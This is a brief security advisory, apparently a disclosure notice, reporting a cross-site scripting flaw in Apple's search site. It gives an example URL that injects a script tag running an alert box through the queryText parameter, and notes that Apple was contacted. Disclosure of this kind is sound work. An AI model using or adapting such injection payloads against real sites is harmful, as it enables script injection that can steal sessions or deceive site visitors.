|
|
| |
| A vulnerability in Apple's web site allows remote attackers to cause it to insert malicious HTML or JavaScript into existing web pages of Apple's web site. |
| |
Credit:
The information has been provided by Bekrar Chaouki of K-Otik Security.
|
| |
Example:
http://search.apple.com/s97is.vts?Action=FilterSearch&ResultTemplate=webx3.hts&ServerKey=Primary&filter=nullflt.hts&collname=apple&SearchPage=http://search.apple.com/&queryText=Apple+XSS"><scr!pt>alert('Found+By+K-Otik')</scr!pt><br&SEARCH%20=Search
Vendor response:
Apple has been contacted.
|
|
|
|
|
|
|
|